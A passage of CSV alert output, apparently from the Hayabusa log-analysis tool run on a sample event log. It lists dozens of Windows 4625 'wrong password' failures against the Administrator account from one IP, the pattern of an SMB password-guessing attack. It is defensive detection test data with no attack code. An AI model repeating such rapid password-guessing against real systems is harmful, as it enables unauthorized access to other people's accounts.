+09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 5ZCDxpmDZbpGCey3 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:28.848 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: SS2dxS3WvCrAyiB2 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 
01:52:28.897 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: YT3VHxKNf8q14rro : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:28.940 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: fx9HQT3u3Ig6vJ3t : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:28.989 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: FukPQsr4SXRshyTn : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:29.037 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 7AutKUyPELNRUcA4 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:29.081 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 38gBkWcYdZW6Wcdz : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:29.121 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: HMKnLRQCDn1CHZdH : IP Address: 192.168.198.149 : AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:29.165 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: ShGnRYHfVSuPvfcX : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:29.221 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: LXVWG3Yl0utv98Zf : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:29.268 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: VDfa0UebgleQMK5U : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:29.321 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: BxTLJJsWs9dOc5JC : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:29.372 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: x7cKtymmsQJSM6zZ : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 
01:52:29.420 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: sbtC0srNyvkIHOSV : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:29.452 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: wPGlJ6ZjGSfUKrCf : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:29.491 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 8Uw95Ema8vWlRXKy : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:29.532 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: hHTrBmhkjGLTNt2R : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:29.574 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: XJeRVGKULJIo76aa : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:29.622 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: Kipf0Z2Tse2eWoxa : IP Address: 192.168.198.149 : AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:29.672 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: bnP7tmMJXDVzIDim : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:29.777 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: CBeMt62oqlIICShT : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:29.868 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: dIfXRZQkKRJAw4er : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:29.933 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 8wrqSJPALo5QtUnS : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:29.981 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 81Mm67AdwpPJMCMm : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 
01:52:30.035 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: Jwq5jXlMRU1SNLO5 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:30.076 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: d7OYj8ynCEl5dG9m : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:30.127 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: YzT8vF7ANYnjSRgd : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:30.164 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: m4eYIoww4uL6oYZu : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:30.199 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: DpO8L2Fky4zYwp2q : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:30.244 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: jGmxSy48sphENTiY : IP Address: 192.168.198.149 : AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:30.285 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: tQVAkjteLFK0hbyE : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:30.330 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: UMWKsQ8l0j9fZPfA : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:30.381 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 2ct7xYUYH9sr7mva : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:30.423 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: GBn0XxaPOZQokJ0Z : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:30.463 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: nQELRxrGuXqkYgO3 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 
01:52:30.509 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 5eT0mykgLNZQygq9 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:30.557 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: qMyIqRidF6oBdzog : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:30.596 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: ULnnFcF98k9zpNTl : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:30.648 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: j5k02pcelZNGwF3u : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:30.693 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: qfcC6LqJqs0EeGjE : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:30.733 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: mXALYkkitmyAFq14 : IP Address: 192.168.198.149 : AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:30.780 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: zIqQmExq22WrW4md : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:30.825 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: ydHqjdZhLMI9gjfj : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:30.865 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: IMSe45VZNPdovPbq : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:30.910 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: hiHlcR6qNGE0P7TK : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:30.950 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: iT3jPdHr89RqPlyd : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 
01:52:30.985 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 0QFnABeYK39XEntR : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:31.068 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 5plMYSBQi5mKmdlk : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:31.113 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 5TaxWckQUCMgWvCZ : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:31.153 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 81xZ7iisEyTABmUm : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:31.187 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: qYiQ2xjMQFQwH2XY : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:31.228 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: eRN8e3yzZzxc2p3A : IP Address: 192.168.198.149 : AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:31.275 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: QCa6PN0C7XznvipG : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:31.311 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: hFqjIXbEb7eWUFUi : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:31.357 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: FkrVjLgnJZlIyXpk : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:31.396 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 2r5tyuIYijAXN5be : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:31.442 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: AgjQNe9hQrLIETDn : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 
01:52:31.484 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: KRNoInpFTsixZDIu : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:31.523 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: ladJUS6I0HMIwdef : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:31.556 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 6oW63pJlVtjgn3YY : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:31.600 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: xKNu8b2To2Y1twUr : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:31.637 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: Q9sN5xm3GytfmM7G : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:31.684 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: FtQQS61GYBm6WUUz : IP Address: 192.168.198.149 : AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:31.724 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 3WxxawZZMhNCGHxc : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:31.764 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: sKP8G2VgJlrr9LMR : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:31.796 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: VvOsNQpk3c5p1FgK : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:31.839 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: H7oz7NPh5Z8UrDPW : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:31.890 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: VvzNFOLBlBv98Do4 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 
01:52:31.932 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 8KJmYytO30Icc6Rb : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:31.962 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: Zro3jLjFXWZ2o8VL : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:31.999 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 2Z2J8VYeuxd9fKcG : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:32.048 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: pXMjOKLfMex7OmMv : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:32.085 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: cgbm3YeoGxCa22Il : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:32.123 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: b7MEstBFjiWhVE18 : IP Address: 192.168.198.149 : AuthPackage: 
